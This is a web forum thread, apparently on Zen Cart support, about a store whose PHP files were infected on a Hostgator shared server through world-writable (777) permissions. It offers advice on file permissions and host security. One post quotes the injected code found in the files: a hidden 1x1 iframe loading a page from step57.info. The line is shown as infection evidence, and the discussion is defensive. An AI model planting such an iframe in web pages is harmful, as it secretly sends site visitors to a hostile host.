A VIRAL Problem!

[Big GEE]

For the third time- This is not coming from Zen Cart - The Trojan is getting into your files that are chmod 777, but the Trojan is ON THE SERVER.

Exactly Kim - and I've been telling them just that until I'm blue in the face! If you look at the copies of the messages above that have been flying between me and Hosgator you'll see what I mean.

G

[DrByte]

I doubt you'll get any further with Hostgator.

1. Zen Cart is clean
2. Your customized files got exploited due to folder permissions.
3. Zen Cart suggests those folders be chmod 777 for editing purposes, and our security docs recommend downgrading that to 644 or so once your content is up-to-date and static.
4. Our security docs also recommend the use of further .htaccess files in sensitive places if you feel the need, with some examples.
5. We cannot and will not anticipate how effectively each host's configuration will operate vis a vis security issues; all we can do is provide guidelines.
Whether further .htaccess files would have protected you in this case is unknown... and only a minimal likelihood.

It's the 777 that left you vulnerable to whatever someone else on the server was doing. I suspect some blog or forum software in someone else's account got hacked, and from there, the hacker ran a program to scan folders and look for writable files, and then replicated its content.

Your host could implement open_basedir restrictions to help guard against that.

But, that's up to them and how seriously they take security concerns.
Your part is just to close the door to your files... chmod...

[Big GEE]

I doubt you'll get any further with Hostgator.

1. Zen Cart is clean
2. Your customized files got exploited due to folder permissions.
3. Zen Cart suggests those folders be chmod 777 for editing purposes, and our security docs recommend downgrading that to 644 or so once your content is up-to-date and static.
4. Our security docs also recommend the use of further .htaccess files in sensitive places if you feel the need, with some examples.
5. We cannot and will not anticipate how effectively each host's configuration will operate vis a vis security issues; all we can do is provide guidelines.
Whether further .htaccess files would have protected you in this case is unknown... and only a minimal likelihood.

It's the 777 that left you vulnerable to whatever someone else on the server was doing. I suspect some blog or forum software in someone else's account got hacked, and from there, the hacker ran a program to scan folders and look for writable files, and then replicated its content.

Your host could implement open_basedir restrictions to help guard against that.

But, that's up to them and how seriously they take security concerns.
Your part is just to close the door to your files... chmod...

Yes it's becoming as clear as day what has happened. The CHMOD 777 was open on certain files because I was in the process of setting the damned thing up. I'm still seething with Hosgator. I'm not prepared to let go of the bone that easily. They need to come up with answers and not fob-offs, if they came clean it would be easier to accept. It's obvious to me that there's an exploit file running wild on their servers, and as far as I'm concerned that's their security liability, they should have to answer for it.

The other problem is the hassle of changing hosts. I've got quite a few sites with them and I was lining up a Reseller account with them. I really could do without this!!!

Thanks Doc - you've been a great help.

G

[Vger]

I think that Big Gee knows that it's not Zen Cart - it's HostGator who are busy trying to pass the buck.

Vger

[Big GEE]

I think that Big Gee knows that it's not Zen Cart - it's HostGator who are busy trying to pass the buck.

Vger

That's right Vger - it's either I'm not expressing myself well enough for others to understand or Kim's parrot is squaking so loudly she can't hear herself reading!!

Absolutely no problem with ZC (and I never suggested there was), in fact I've been sweating pints fighting ZCs corner after Hostgator started shifting the blame in that direction.

Thanks,

G

[xt0rt]

The irresponsibility of many of these bigname hosts sickens me to no end. Whether it be overloaded servers, hijacked servers, or ****ty customer service they never take responsibility for problems that arise on their end. All they care about is that next monthly payment. The worst part is they have so many customers that if you leave them it really doesn't matter.

My advice, again, would be to switch hosts. There are other good ones out there with referral programs. Second, get on some forums and host review sites and let Hostgator know you're not just another naive cash flow opportunity.

[Big GEE]

The irresponsibility of many of these bigname hosts sickens me to no end. Whether it be overloaded servers, hijacked servers, or ****ty customer service they never take responsibility for problems that arise on their end. All they care about is that next monthly payment. The worst part is they have so many customers that if you leave them it really doesn't matter.

My advice, again, would be to switch hosts. There are other good ones out there with referral programs. Second, get on some forums and host review sites and let Hostgator know you're not just another naive cash flow opportunity.

Yes I know, but they are sensitive about bad publicity that CAN hurt. On the bright side I got the big "climb down" today (see a copy below). However this is only the start - they now need to get their act together to convince me they're going to do something about their security. By default certain files have to have "write" attributes to work correctly. Everyone should be able to work in an environment where the host company can be trusted to protect people up to a reasonable standard in those circumstances - at present Hostgator obviously don't.

I'll keep you posted.

Regards,

G

Gwilym,

You are correct that there could in fact be a script located on the server hunting for writeable scripts: However at this time we're unable to find one.

I'd highly recommend following the advice in the thread you've posted.
The specific one is:

DannoUK - what's almost certainly happened is this:

A malicious script has been set loose on the webhosts server.
That script searches for files that it can write to.
Such files are usually theme files.
This is not WP hacking as much a combination of a webhost security and your file permissions.

Download your current theme.
Go through each file in that theme checking for the garbage code.
Delete it all obviously
Upload the files and then change their permissions to 644 and NO higher. No 664 / 666 or anything else.
Check the site works.
If not, check your file editing.

You cannot now edit files online.

NO files on a site should ever be writable and if they are you must know where, why and the risks.

Let us know if you have any further questions or concerns.

Dave M.
Hostgator Customer Support

[xt0rt]

Be persistent like herpes until they resolve the situation.

[Big GEE]

I've just downloaded the whole of my ZC files from my host's server to a folder on my PC. I've checked a few PHP files in the html_includes folder and every one seems to be infected with the this rogue line of coding

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

I now have three choices:

1. Sit down for hours going through each and every file and manually removing the above line when found.

2. Deleting the whole file-set and starting again or

3. Getting my hands on some editing software that will scan each and every file in the downloaded "suspect" files folder and then either delete or replace the spurious line with one command.

Does anyone know of such a piece of software kit? I've got Winmerge but from what I can see of that (good as it seems) it only allows you to open a selected file in one pane and then compares it to another selected file of your choice in a second pane and then it allowing you to merge any changes into one resulting file. Doing that will take longer than opening each file in a text editor and using the "replace" edit function to delete the iframe string.

Can someone help?

G

[Ajeh]

Get the files from our get Zen Cart link at the top of the page ...

It sounds like what ever you are using to install has a serious problem that you should make your hosting site aware of ...

That is not part of the original Zen Cart ...

If you download from here and upload those files and that shows up again ... then there is a more serious issue happening that needs to be addressed ...